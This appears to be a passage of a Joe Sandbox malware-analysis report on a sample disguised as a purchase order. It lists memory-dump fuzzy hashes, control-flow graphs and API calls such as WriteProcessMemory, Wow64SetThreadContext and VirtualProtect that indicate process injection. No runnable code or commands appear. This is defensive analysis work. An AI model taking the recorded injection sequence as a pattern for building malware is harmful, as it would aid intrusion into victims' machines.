                                        • Snapshot File: hcaresult_0_2_6d30000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c4db06665180f85bca148bb157fd71e27f5c1e86d531ebee4420a9acefb37c05
                                        • Instruction ID: 89f16dac0db4660acd0e61d4cc76ed7fc3d4c6e296c1a901fac6640ef23f53e0
                                        • Opcode Fuzzy Hash: c4db06665180f85bca148bb157fd71e27f5c1e86d531ebee4420a9acefb37c05
                                        • Instruction Fuzzy Hash: 03A2A375E00228CFDB65CF69C984A99BBB2FF89304F1581E9D509AB325DB319E81CF50
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2344143060.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6d30000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 95a36a2e18f35b8a8f1594d480b8caa8a3fab88fcfd76f932ecdfb77a5ac9e70
                                        • Instruction ID: 42100d125450ef1713deb33041d003dfe19c9716b72588ba4f467a4f06990356
                                        • Opcode Fuzzy Hash: 95a36a2e18f35b8a8f1594d480b8caa8a3fab88fcfd76f932ecdfb77a5ac9e70
                                        • Instruction Fuzzy Hash: E452B274A00628CFDBA4DF28D894BAAB7B2FB48301F1091D9D94DA7355DB30AE81CF51
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2346655455.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7190000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c5a0e4a116a54e9ded8a350a5e3f48dee878a5ca0d1464bdcd04b5cb02e1150f
                                        • Instruction ID: 0f4a8d52e5f3ef05ec86157109b74e67ab32bead2f6462f4323f8f98d9df91d3
                                        • Opcode Fuzzy Hash: c5a0e4a116a54e9ded8a350a5e3f48dee878a5ca0d1464bdcd04b5cb02e1150f
                                        • Instruction Fuzzy Hash: 9112F0B4A05229DFDB65DF29D884B9AB7B6FB4A300F1081E9D509A7390DB345EC1CF42
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2345923587.0000000006FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FC0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6fc0000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7fc7b43bc326fb38275ade3bdc3bf5b3be99931795a253897cde6c8b359871a0
                                        • Instruction ID: 7f2b7f2500c302ca18825aaf1fc8cadfe052e2b70ba19db9577fec8455f1b71b
                                        • Opcode Fuzzy Hash: 7fc7b43bc326fb38275ade3bdc3bf5b3be99931795a253897cde6c8b359871a0
                                        • Instruction Fuzzy Hash: C8023570E04229CFEBA4CF6AD980BA9B7B2FB89310F1081A9D509A7350DB745E84CF51
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2346655455.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7190000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9999f6d2158551f7f271ad0d1d220ec1890b8c676a5b207c9eabfb0ee6c2adda
                                        • Instruction ID: b90d036de46c0f73e0e041b32be58e84699487fe8f823a80b7da215fdea86468
                                        • Opcode Fuzzy Hash: 9999f6d2158551f7f271ad0d1d220ec1890b8c676a5b207c9eabfb0ee6c2adda
                                        • Instruction Fuzzy Hash: 3912F1B4A45229DFDB65CF19D884B9AB7B6FB8A300F1081E9D509A7380DB345EC1CF42
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2346655455.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7190000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 53c602e6b83007cb7c4556e70b3bacd58984787f6c760058c71618c847bd55fb
                                        • Instruction ID: d6b23727e6d798e58f30795730090557d94b2ef009dc00d57819175964a7ea89
                                        • Opcode Fuzzy Hash: 53c602e6b83007cb7c4556e70b3bacd58984787f6c760058c71618c847bd55fb
                                        • Instruction Fuzzy Hash: 1C12E0B4A45229DFDB65CF19D884B9AB7B6FB8A300F1081E9D509A7380DB345EC1CF42
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2345180356.0000000006E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6e90000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 96eb6e9f6155064866dacb30f31fe386f6d26970ce9fb934d39cb8a46ff2c257
                                        • Instruction ID: 5acbfc2c71f2b042872c2d0837476cccc3dfc836dd1ddb4f01b7420ea164ee52
                                        • Opcode Fuzzy Hash: 96eb6e9f6155064866dacb30f31fe386f6d26970ce9fb934d39cb8a46ff2c257
                                        • Instruction Fuzzy Hash: 38E10474A15209CFDB84DFA9E584BEEB7B6EF49300F10A06AD40AAB380D7745D45CB92
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2346655455.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7190000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7d6bd208f984388bc990afe69efea0cc1f637a137c697ef070f3b83de12c7e01
                                        • Instruction ID: 0e57505a1b9d339403f6fbc3ffbb33d2fb74369a35d6192c8047548fa215673d
                                        • Opcode Fuzzy Hash: 7d6bd208f984388bc990afe69efea0cc1f637a137c697ef070f3b83de12c7e01
                                        • Instruction Fuzzy Hash: 92E1E5B0E44218CFDB28CF69D884B9DBBF2FB8A300F1180A9D519A7395DB345986CF51
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2346655455.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7190000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3b630407ea60b31fc5a3b0ed5759749ff86343445e3909b307a4d13d065641ac
                                        • Instruction ID: dd5adc2d3425e057fc93b48804f602fa18a2d77850c91e00498a9437de209ac5
                                        • Opcode Fuzzy Hash: 3b630407ea60b31fc5a3b0ed5759749ff86343445e3909b307a4d13d065641ac
                                        • Instruction Fuzzy Hash: 96E1D3B0E44218DFDB28CF69D884B9EBBF2FB89300F1180A9D419A7395DB745986CF51
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2345180356.0000000006E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6e90000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 211d14d6dc1c6b8f100eb0ab1f14d819408eb7626bbf9ea682168af8e6dd111a
                                        • Instruction ID: 42b26421a1e330d9759248e9a5ec76e3979f65e58ccd3fa2c6cc3f5357b7cc7c
                                        • Opcode Fuzzy Hash: 211d14d6dc1c6b8f100eb0ab1f14d819408eb7626bbf9ea682168af8e6dd111a
                                        • Instruction Fuzzy Hash: 0DD10274A15209CFDB84DFA9D584BEEB7B6EF49300F10A06AD40AAB381D7745D44CFA2
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2344143060.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6d30000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 275c5fec638b1461b2610b7887a4b1b14ed9ccc679e55651c1344dc7a4f2f5f2
                                        • Instruction ID: 22406323f47effa4cd0f97173620a191c6cb1d73d9fb778bf18c3d83d50b683f
                                        • Opcode Fuzzy Hash: 275c5fec638b1461b2610b7887a4b1b14ed9ccc679e55651c1344dc7a4f2f5f2
                                        • Instruction Fuzzy Hash: FDD1B174E01258CFDB54DFA9D994A9DBBB2FF88304F2081A9D409AB365DB34AD81CF50
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2346655455.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7190000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 34290db62f98ce86e4e2913c0b57985dc6def3273b2d8322bf3ed0be227daedc
                                        • Instruction ID: 3630fde4dc6f57d96cb61bd982804fc36ae7689aab4d08d3aa6f4926428cf538
                                        • Opcode Fuzzy Hash: 34290db62f98ce86e4e2913c0b57985dc6def3273b2d8322bf3ed0be227daedc
                                        • Instruction Fuzzy Hash: E7B15EB0E1020ADFDF11CFA9D99179EBBF2AF88714F14813DD415A7294EB74A846CB81
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2344143060.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6d30000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4f3104cba466c0c30a07863a50342f51cc98218f5bd4490a986450e8a408ba2d
                                        • Instruction ID: 94edbae1b5ae46954936645d80c87e9d0d18405683abe95035e8082270d8abee
                                        • Opcode Fuzzy Hash: 4f3104cba466c0c30a07863a50342f51cc98218f5bd4490a986450e8a408ba2d
                                        • Instruction Fuzzy Hash: 64B1D4B4D05268CFEB54CF6AC9887DDBBF2AF89305F1081A9D409AB354D7349A89CF44
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2345923587.0000000006FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FC0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6fc0000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 02bc63f8101c2332d007fec2bdaa63e987ab8a9e71166175859d42ddf4cdd961
                                        • Instruction ID: fb29b938a110c5091f1c21f95c6c3cacff9e0cb037fb9c6ff78ad516abc58313
                                        • Opcode Fuzzy Hash: 02bc63f8101c2332d007fec2bdaa63e987ab8a9e71166175859d42ddf4cdd961
                                        • Instruction Fuzzy Hash: 5CB1F470E04219CFEB94EFAAD984BADBBF2BB89310F109069D409A7355DB345D85CF81
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2345923587.0000000006FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FC0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6fc0000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9579a4cb43dc04cda6df818b4f079ccfe9808c5f77135a3c9646ce738877e46f
                                        • Instruction ID: 4d717cc9496172c767f26dbf9df1d9adb798eb3cc6e59a72adb275d56e41dd3b
                                        • Opcode Fuzzy Hash: 9579a4cb43dc04cda6df818b4f079ccfe9808c5f77135a3c9646ce738877e46f
                                        • Instruction Fuzzy Hash: 7BB1F470E00219CFEB94EFAAD984BADBBF2BB89310F209069D409A7355DB345D85CF41
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2345923587.0000000006FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FC0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6fc0000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 08413f995e7a3bd8edabd14a6903b435bdb9e1b9f994d32e30a49b0b1e4e6b2b
                                        • Instruction ID: a80b932af73d6380ed86db92cb40c7d84235f819b80541ecd604a5543499e524
                                        • Opcode Fuzzy Hash: 08413f995e7a3bd8edabd14a6903b435bdb9e1b9f994d32e30a49b0b1e4e6b2b
                                        • Instruction Fuzzy Hash: 54912570D0921ACFEB94CF65DA84BADBBB2FF49314F2080A9D009E7251DB759984DF81
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2346655455.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7190000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d96e2e401491524083183aa7f76870bdcaa8630b330ca05701d14d8f02ab4ac4
                                        • Instruction ID: 2dd4571d52f2127cee0ad4cf30c77cfbd797bc87cef33f9d944162a9c66c6863
                                        • Opcode Fuzzy Hash: d96e2e401491524083183aa7f76870bdcaa8630b330ca05701d14d8f02ab4ac4
                                        • Instruction Fuzzy Hash: A78115B0D05218CFEB19CFA9D884BEDBBF2FB89304F1481A9D409AB294D7745996CF01
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2346655455.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7190000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d97d1500204e24b44dda052edf54d6b656338c00d2533bea189ffda1832bc57f
                                        • Instruction ID: ab0b00b9a8c6b8a1794e4597722691261d79c8eb872ba2cb6b4591aaf70bcfee
                                        • Opcode Fuzzy Hash: d97d1500204e24b44dda052edf54d6b656338c00d2533bea189ffda1832bc57f
                                        • Instruction Fuzzy Hash: C78117B0D05218CFEB59CFA9D884B9DBBF2BB89300F1081A9D409BB394D7744995CF01
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2347013021.0000000007240000.00000040.00000800.00020000.00000000.sdmp, Offset: 07240000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7240000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 85b45eb7d88a08b9c5b85411602a2e52d78ffa36390e108664ca4cd0bc2c3c87
                                        • Instruction ID: 3834690c002d3c9d16817b5ab0988664bae23c569fb7835e315485fd0dd6baa2
                                        • Opcode Fuzzy Hash: 85b45eb7d88a08b9c5b85411602a2e52d78ffa36390e108664ca4cd0bc2c3c87
                                        • Instruction Fuzzy Hash: B2612BB4E21209CBDB04CFA9D5856AEBBF2FF89301F24D165D409E7344D7349986CB91
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2346244004.0000000007030000.00000040.00000800.00020000.00000000.sdmp, Offset: 07030000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7030000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: cc98a0af6b867566a0ffc4db77721c7ec2e13d7196e142fab5df0e6ebb812e0a
                                        • Instruction ID: b37a86edfb8628be188ecfee27fb8e37c0a507513bbd87f0d9d333c3b736101d
                                        • Opcode Fuzzy Hash: cc98a0af6b867566a0ffc4db77721c7ec2e13d7196e142fab5df0e6ebb812e0a
                                        • Instruction Fuzzy Hash: 44515AB4E15208CFDB10DFA9E4447EDBBFAEB8A311F10912AE419A7384D7346985CF45
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2346244004.0000000007030000.00000040.00000800.00020000.00000000.sdmp, Offset: 07030000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7030000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: df5f5d42682e00818b207079dc11a20a88cd1effe223dc760e4bcc2bd528656a
                                        • Instruction ID: d2a5646a408ad53aff6cca165cb32742af893c8bfe870df2e4db9e7b86dfc168
                                        • Opcode Fuzzy Hash: df5f5d42682e00818b207079dc11a20a88cd1effe223dc760e4bcc2bd528656a
                                        • Instruction Fuzzy Hash: 8E5149B4E15208CFDB10CFA9D1447EDBBFAEB8A301F10912AD419A7344D7346985CF44
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2324244085.0000000002F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F80000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2f80000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9e60bde18f0e686283224bb250e137cc08cebcb9f23b7c3cba216a737417ef66
                                        • Instruction ID: 74751e0795075bc82f43061be859297fec6603e133511fc4e0f15b5f37283677
                                        • Opcode Fuzzy Hash: 9e60bde18f0e686283224bb250e137cc08cebcb9f23b7c3cba216a737417ef66
                                        • Instruction Fuzzy Hash: 7351B079D416288BEB64EF2ACC84B9DF7B2AB48344F2486E9D50DA2211DB745AC5CF40

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 0 6e958c4-6e958d8 1 6e9587a-6e95888 0->1 2 6e958da-6e958f2 0->2 3 6e94bdc-6e94be4 1->3 4 6e9588e-6e95896 1->4 18 6e958f8 call 6e96740 2->18 19 6e958f8 call 6e96733 2->19 5 6e94bed-6e95dcf 3->5 6 6e94be6-6e94fad 3->6 4->3 9 6e95dd1 5->9 10 6e95dd6-6e95de5 5->10 13 6e94faf 6->13 14 6e94fb4-6e94fd1 6->14 9->10 10->3 12 6e958fe-6e95934 12->3 17 6e9593a-6e95942 12->17 13->14 14->3 15 6e94fd7-6e94fdf 14->15 15->3 17->3 18->12 19->12
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2345180356.0000000006E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6e90000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: ;$U$\
                                        • API String ID: 0-3334559425
                                        • Opcode ID: 39de505214eaec3630648fd6acba97de3df0484aca9f5d936fa46c44be8bc6f8
                                        • Instruction ID: d4e0abc6dec171473ba1134f139bb1a36cba84fb4100e8300f67ffe83394099d
                                        • Opcode Fuzzy Hash: 39de505214eaec3630648fd6acba97de3df0484aca9f5d936fa46c44be8bc6f8
                                        • Instruction Fuzzy Hash: 28118E70415349DFEB42DB64D894BC97BF1FF06308F1451E9D44997282DB380885CF90

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1158 61855e4-6185651 1161 618568a-61856aa 1158->1161 1162 6185653-618565d 1158->1162 1167 61856ac-61856b6 1161->1167 1168 61856e3-6185745 CopyFileA 1161->1168 1162->1161 1163 618565f-6185661 1162->1163 1165 6185663-618566d 1163->1165 1166 6185684-6185687 1163->1166 1169 618566f 1165->1169 1170 6185671-6185680 1165->1170 1166->1161 1167->1168 1171 61856b8-61856ba 1167->1171 1180 618574e-6185796 1168->1180 1181 6185747-618574d 1168->1181 1169->1170 1170->1170 1172 6185682 1170->1172 1173 61856bc-61856c6 1171->1173 1174 61856dd-61856e0 1171->1174 1172->1166 1176 61856c8 1173->1176 1177 61856ca-61856d9 1173->1177 1174->1168 1176->1177 1177->1177 1178 61856db 1177->1178 1178->1174 1186 6185798-618579c 1180->1186 1187 61857a6-61857aa 1180->1187 1181->1180 1186->1187 1190 618579e 1186->1190 1188 61857ba 1187->1188 1189 61857ac-61857b0 1187->1189 1192 61857bb 1188->1192 1189->1188 1191 61857b2 1189->1191 1190->1187 1191->1188 1192->1192
                                        APIs
                                        • CopyFileA.KERNEL32(?,?,?), ref: 06185735
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2342439739.0000000006180000.00000040.00000800.00020000.00000000.sdmp, Offset: 06180000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6180000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID: CopyFile
                                        • String ID:
                                        • API String ID: 1304948518-0
                                        • Opcode ID: 7a1ceb315d4ba8d09a4f89e1d933feff8109ad556211eab3f9ef0f3f5706fa73
                                        • Instruction ID: fff650aed491271a6b6df73ffe76733af0baf2c688dedb8b0f5265191d28a930
                                        • Opcode Fuzzy Hash: 7a1ceb315d4ba8d09a4f89e1d933feff8109ad556211eab3f9ef0f3f5706fa73
                                        • Instruction Fuzzy Hash: 5B516971D10659DFDB90EFA9C8857EEBBF2EF48310F248529E854A7240DB749881CF81

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1193 61855f0-6185651 1195 618568a-61856aa 1193->1195 1196 6185653-618565d 1193->1196 1201 61856ac-61856b6 1195->1201 1202 61856e3-6185745 CopyFileA 1195->1202 1196->1195 1197 618565f-6185661 1196->1197 1199 6185663-618566d 1197->1199 1200 6185684-6185687 1197->1200 1203 618566f 1199->1203 1204 6185671-6185680 1199->1204 1200->1195 1201->1202 1205 61856b8-61856ba 1201->1205 1214 618574e-6185796 1202->1214 1215 6185747-618574d 1202->1215 1203->1204 1204->1204 1206 6185682 1204->1206 1207 61856bc-61856c6 1205->1207 1208 61856dd-61856e0 1205->1208 1206->1200 1210 61856c8 1207->1210 1211 61856ca-61856d9 1207->1211 1208->1202 1210->1211 1211->1211 1212 61856db 1211->1212 1212->1208 1220 6185798-618579c 1214->1220 1221 61857a6-61857aa 1214->1221 1215->1214 1220->1221 1224 618579e 1220->1224 1222 61857ba 1221->1222 1223 61857ac-61857b0 1221->1223 1226 61857bb 1222->1226 1223->1222 1225 61857b2 1223->1225 1224->1221 1225->1222 1226->1226
                                        APIs
                                        • CopyFileA.KERNEL32(?,?,?), ref: 06185735
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2342439739.0000000006180000.00000040.00000800.00020000.00000000.sdmp, Offset: 06180000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6180000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID: CopyFile
                                        • String ID:
                                        • API String ID: 1304948518-0
                                        • Opcode ID: 84ba9de079d4296619e6019b700a53ab8852991ee85b9c4b0bbf12a8195c7b01
                                        • Instruction ID: 5c633be78856eaf012cbfe6e9713351fd93eac46e914d9c71330c67e38ce5437
                                        • Opcode Fuzzy Hash: 84ba9de079d4296619e6019b700a53ab8852991ee85b9c4b0bbf12a8195c7b01
                                        • Instruction Fuzzy Hash: 05515871D107599FDB90EFA9C8857AEBBF2FF48310F248529E854A7280DB749841CF81

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1227 71f2998-71f29e6 1229 71f29e8-71f29f4 1227->1229 1230 71f29f6-71f2a35 WriteProcessMemory 1227->1230 1229->1230 1232 71f2a3e-71f2a6e 1230->1232 1233 71f2a37-71f2a3d 1230->1233 1233->1232
                                        APIs
                                        • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 071F2A28
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2346955002.00000000071F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: true
                                        • Associated: 00000000.00000002.2346719840.00000000071A0000.00000004.08000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_71a0000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID: MemoryProcessWrite
                                        • String ID:
                                        • API String ID: 3559483778-0
                                        • Opcode ID: 50209fc14ff93f8e1d5e8ca1daa80bd48b5ebf5b5a6b67f6abe0328e38e92ecb
                                        • Instruction ID: f4ffcf00123951da4abebc3419297952bf571195e4d32f6a448f83813c7d2a28
                                        • Opcode Fuzzy Hash: 50209fc14ff93f8e1d5e8ca1daa80bd48b5ebf5b5a6b67f6abe0328e38e92ecb
                                        • Instruction Fuzzy Hash: 342124B19003599FDB10CFAAC981BDEBBF5FF48320F10842AE958A7240D7789944CBA4

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1237 71f2188-71f21d3 1239 71f21d5-71f21e1 1237->1239 1240 71f21e3-71f2213 Wow64SetThreadContext 1237->1240 1239->1240 1242 71f221c-71f224c 1240->1242 1243 71f2215-71f221b 1240->1243 1243->1242
                                        APIs
                                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 071F2206
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2346955002.00000000071F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: true
                                        • Associated: 00000000.00000002.2346719840.00000000071A0000.00000004.08000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_71a0000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID: ContextThreadWow64
                                        • String ID:
                                        • API String ID: 983334009-0
                                        • Opcode ID: 64d510b1bcf52970615cce7a5f381df9342be48d0853d50241e12144a7a3bea6
                                        • Instruction ID: bf1b93fd9205e1d030349033b8adc3490fa88db09d66d6a50ff18c4d4cb63ca7
                                        • Opcode Fuzzy Hash: 64d510b1bcf52970615cce7a5f381df9342be48d0853d50241e12144a7a3bea6
                                        • Instruction Fuzzy Hash: 762138B19003099FDB10DFAAC8857AEBBF4FF88310F148429D559A7240C7789944CFA5

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1247 6d30300-6d30389 VirtualProtect 1250 6d30392-6d303b7 1247->1250 1251 6d3038b-6d30391 1247->1251 1251->1250
                                        APIs
                                        • VirtualProtect.KERNEL32(?,?,?,?), ref: 06D3037C
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2344143060.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6d30000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID: ProtectVirtual
                                        • String ID:
                                        • API String ID: 544645111-0
                                        • Opcode ID: 7e5e33a75e3be2f1f09460f8d722ecd2483e2fe09589b46d3a33d3db7edd80c6
                                        • Instruction ID: bb062ee577c22ce0d37c345c3132af9d6a1b04fa5398bbcf04932d8a769ac7e5
                                        • Opcode Fuzzy Hash: 7e5e33a75e3be2f1f09460f8d722ecd2483e2fe09589b46d3a33d3db7edd80c6
                                        • Instruction Fuzzy Hash: 67210471D043499FDB10DFAAC881BEEFBF5AF88320F14842AD459A7210C7799945CFA1

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1263 719b850-719b8af KiUserCallbackDispatcher 1264 719b8b8-719b8e9 1263->1264 1265 719b8b1-719b8b7 1263->1265 1268 719b8eb-719b8f1 1264->1268 1269 719b8f2-719b912 1264->1269 1265->1264 1268->1269
                                        APIs
                                        • KiUserCallbackDispatcher.NTDLL(00000000), ref: 0719B89E
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2346655455.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7190000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID: CallbackDispatcherUser
                                        • String ID:
                                        • API String ID: 2492992576-0
                                        • Opcode ID: ee39bd558bc4be03d7718f95bf22f6e1eb017db46160996f25ceb43e351ecc64
                                        • Instruction ID: 0e765b296080926879f5f4920ffa0ff0b181f4df1cee7c83c20cc471e2347089
                                        • Opcode Fuzzy Hash: ee39bd558bc4be03d7718f95bf22f6e1eb017db46160996f25ceb43e351ecc64
                                        • Instruction Fuzzy Hash: 36211FB08043599FEB20CF9AD44A79AFBF4AB48314F24842ED518AB380C3786584CFA5

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1255 6d30308-6d30389 VirtualProtect 1258 6d30392-6d303b7 1255->1258 1259 6d3038b-6d30391 1255->1259 1259->1258
                                        APIs
                                        • VirtualProtect.KERNEL32(?,?,?,?), ref: 06D3037C
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2344143060.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6d30000_Purchase Order A2409002.jbxd
                                        Similarity
                                        • API ID: ProtectVirtual
                                        • String ID:
                                        • API String ID: 544645111-0
                                        • Opcode ID: a84bdd2d5665d8f1831f7fdbb555f8e2eb14530a9ea4e4bcdfccf778c675df12
                                        • Instruction ID: 84b87e79782cfa3aa2355ac4102e190bb4885be7c5f027ddf00b30d40b74f87d
